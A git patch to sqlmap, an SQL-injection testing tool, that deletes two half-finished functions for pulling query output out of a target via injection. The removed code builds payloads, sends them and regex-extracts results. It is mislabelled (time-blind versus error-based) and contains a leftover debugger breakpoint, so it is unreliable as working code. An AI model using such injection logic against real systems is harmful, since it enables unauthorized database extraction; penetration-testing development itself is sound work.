From 537b6191659e301324cb8368ea487c21a4977cfd Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Wed, 8 Dec 2010 12:30:25 +0000
Subject: [PATCH] removing junk

---
 lib/request/inject.py | 66 -------------------------------------------
 1 file changed, 66 deletions(-)

diff --git a/lib/request/inject.py b/lib/request/inject.py
index e05db5f52..0f0bdf544 100644
--- a/lib/request/inject.py
+++ b/lib/request/inject.py
@@ -336,72 +336,6 @@ def __goError(expression, resumeValue=True):
 
     return result
 
-def __goTimeBlind(expression, resumeValue=True):
-    """
-    Retrieve the output of a SQL query taking advantage of an error-based
-    SQL injection vulnerability on the affected parameter.
-    """
-
-    result = None
-
-    if conf.direct:
-        return direct(expression), None
-
-    condition = (
-                  kb.resumedQueries and conf.url in kb.resumedQueries.keys()
-                  and expression in kb.resumedQueries[conf.url].keys()
-                )
-
-    if condition and resumeValue:
-        result = resume(expression, None)
-
-    if not result:
-        result = timeBlindUse(expression)
-        dataToSessionFile("[%s][%s][%s][%s][%s]\n" % (conf.url, kb.injection.place, conf.parameters[kb.injection.place], expression, replaceNewlineTabs(result)))
-
-    return result
-
-def timeBlindUse(expression):
-    """
-    Retrieve the output of a SQL query taking advantage of an error SQL
-    injection vulnerability on the affected parameter.
-    """
-
-    output = None
-    import pdb
-    pdb.set_trace()
-    vector = agent.cleanupPayload(kb.injection.data[5].vector)
-    query = unescaper.unescape(vector)
-    query = agent.prefixQuery(query)
-    query = agent.suffixQuery(query)
-    check = "%s(?P<result>.*?)%s" % (kb.misc.start, kb.misc.stop)
-
-    _, _, _, _, _, _, fieldToCastStr = agent.getFields(expression)
-    nulledCastedField = agent.nullAndCastField(fieldToCastStr)
-
-    if kb.dbms == DBMS.MYSQL:
-        nulledCastedField = nulledCastedField.replace("AS CHAR)", "AS CHAR(100))") # fix for that 'Subquery returns more than 1 row'
-
-    expression = expression.replace(fieldToCastStr, nulledCastedField, 1)
-    expression = unescaper.unescape(expression)
-    expression = safeStringFormat(query, expression)
-
-    debugMsg = "query: %s" % expression
-    logger.debug(debugMsg)
-
-    payload = agent.payload(newValue=expression)
-    reqBody, _ = Request.queryPage(payload, content=True)
-    output = extractRegexResult(check, reqBody, re.DOTALL | re.IGNORECASE)
-
-    if output:
-        output = output.replace(kb.misc.space, " ")
-
-        if conf.verbose > 0:
-            infoMsg = "retrieved: %s" % replaceNewlineTabs(output, stdout=True)
-            logger.info(infoMsg)
-
-    return output
-
 def __goInband(expression, expected=None, sort=True, resumeValue=True, unpack=True, dump=False):
     """
     Retrieve the output of a SQL query taking advantage of an inband SQL